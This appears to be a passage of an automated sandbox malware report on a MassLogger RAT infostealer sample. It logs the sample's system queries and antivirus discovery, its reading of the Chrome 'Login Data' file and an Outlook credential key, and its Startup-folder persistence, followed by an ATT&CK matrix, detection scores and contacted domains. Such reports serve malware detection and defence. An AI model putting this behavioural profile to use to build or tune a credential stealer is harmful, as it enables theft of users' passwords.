Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\ProgramData\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe VolumeInformation

Source: C:\ProgramData\a.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Source: a.exe, 0000000B.00000002.771565710.0000000000DC7000.00000004.00000001.sdmp, a.exe, 00000011.00000002.839119724.0000000000C8A000.00000004.00000001.sdmp	Binary or memory string: \??\C:\Program Files (x86)\AVG\Antivirus\AVGUI.exe
Source: a.exe, 00000001.00000002.709230972.0000000000BC7000.00000004.00000001.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: a.exe, 00000001.00000002.709683488.00000000027FE000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.774809994.0000000002CFC000.00000004.00000001.sdmp, a.exe, 00000011.00000002.844042385.0000000002A53000.00000004.00000001.sdmp	Binary or memory string: e.C:\Program Files (x86)\AVG\Antivirus\AVGUI.exe
Source: a.exe, 00000001.00000002.709683488.00000000027FE000.00000004.00000001.sdmp, a.exe, 0000000B.00000002.774809994.0000000002CFC000.00000004.00000001.sdmp, a.exe, 00000011.00000002.844042385.0000000002A53000.00000004.00000001.sdmp	Binary or memory string: e(C:\Program Files\AVG\Antivirus\AVGUI.exe

Source: C:\ProgramData\a.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct

Stealing of Sensitive Information:

Yara detected MassLogger RAT

Show sources

Source: Yara match	File source: 0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.947711194.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.710965832.0000000003A90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.853281517.00000000039A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.858549049.0000000003C8C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.775433502.0000000003881000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 5036, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 6200, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 5508, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 6772, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 740, type: MEMORY
Source: Yara match	File source: 1.2.a.exe.39bc1e0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.a.exe.3a9c1e0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.a.exe.3a9c240.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.a.exe.3bbc1e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.a.exe.3a89990.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.a.exe.3a9c1e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.a.exe.3889990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.a.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.a.exe.3b7c240.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.a.exe.3969990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.a.exe.3b7c240.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.a.exe.39bc1e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.a.exe.3c9c240.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.a.exe.3c9c240.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.a.exe.3a9c240.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.a.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.a.exe.3bbc1e0.2.unpack, type: UNPACKEDPE

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Yara match	File source: 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 5036, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 5508, type: MEMORY

Remote Access Functionality:

Yara detected MassLogger RAT

Show sources

Source: Yara match	File source: 0000000B.00000002.777758927.0000000003B6D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.947711194.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.710965832.0000000003A90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.853281517.00000000039A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.858549049.0000000003C8C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.775433502.0000000003881000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.866618994.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 5036, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 6200, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 5508, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 6772, type: MEMORY
Source: Yara match	File source: Process Memory Space: a.exe PID: 740, type: MEMORY
Source: Yara match	File source: 1.2.a.exe.39bc1e0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.a.exe.3a9c1e0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.a.exe.3a9c240.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.a.exe.3bbc1e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.a.exe.3a89990.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.a.exe.3a9c1e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.a.exe.3889990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.a.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.a.exe.3b7c240.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.a.exe.3969990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.a.exe.3b7c240.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.a.exe.39bc1e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.a.exe.3c9c240.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.a.exe.3c9c240.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.a.exe.3a9c240.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.a.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.a.exe.3bbc1e0.2.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation121	Registry Run Keys / Startup Folder1	Process Injection12	Disable or Modify Tools1	OS Credential Dumping1	File and Directory Discovery2	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting22	Boot or Logon Initialization Scripts	Registry Run Keys / Startup Folder1	Deobfuscate/Decode Files or Information1	Input Capture1	System Information Discovery25	Remote Desktop Protocol	Data from Local System1	Exfiltration Over Bluetooth	Encrypted Channel12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Native API1	Logon Script (Windows)	Logon Script (Windows)	Scripting22	Security Account Manager	Query Registry1	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Exploitation for Client Execution43	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information11	NTDS	Security Software Discovery341	Distributed Component Object Model	Input Capture1	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Command and Scripting Interpreter1	Network Logon Script	Network Logon Script	Software Packing2	LSA Secrets	Virtualization/Sandbox Evasion14	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol13	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	PowerShell1	Rc.common	Rc.common	Masquerading11	Cached Domain Credentials	Process Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion14	DCSync	Application Window Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection12	Proc Filesystem	Remote System Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	System Network Configuration Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\mensajeria_system[1].exe	100%	Joe Sandbox ML
C:\ProgramData\a.exe	100%	Joe Sandbox ML
C:\ProgramData\a.exe	8%	Metadefender		Browse
C:\ProgramData\a.exe	28%	ReversingLabs	ByteCode-MSIL.Infostealer.Maslog
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\mensajeria_system[1].exe	8%	Metadefender		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\mensajeria_system[1].exe	28%	ReversingLabs	ByteCode-MSIL.Infostealer.Maslog

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
20.2.a.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1139343		Download File
13.2.a.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1139343		Download File

Domains

Source	Detection	Scanner	Label	Link
pastex.pro	2%	Virustotal		Browse
raw.githubusercontent.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://wus2-000.contentsync.	0%	URL Reputation	safe
https://wus2-000.contentsync.	0%	URL Reputation	safe
https://wus2-000.contentsync.	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
https://ofcrecsvcapi-int.azurewebsites.net/	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://api.ipify.orgD	0%	URL Reputation	safe
http://api.ipify.orgD	0%	URL Reputation	safe
http://api.ipify.orgD	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://api.ipify.org4	0%	Avira URL Cloud	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://officeci.azurewebsites.net/api/	0%	Avira URL Cloud	safe
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://wus2-000.pagecontentsync.	0%	URL Reputation	safe
https://wus2-000.pagecontentsync.	0%	URL Reputation	safe
https://wus2-000.pagecontentsync.	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://raw.githubusercontent.com4	0%	Avira URL Cloud	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
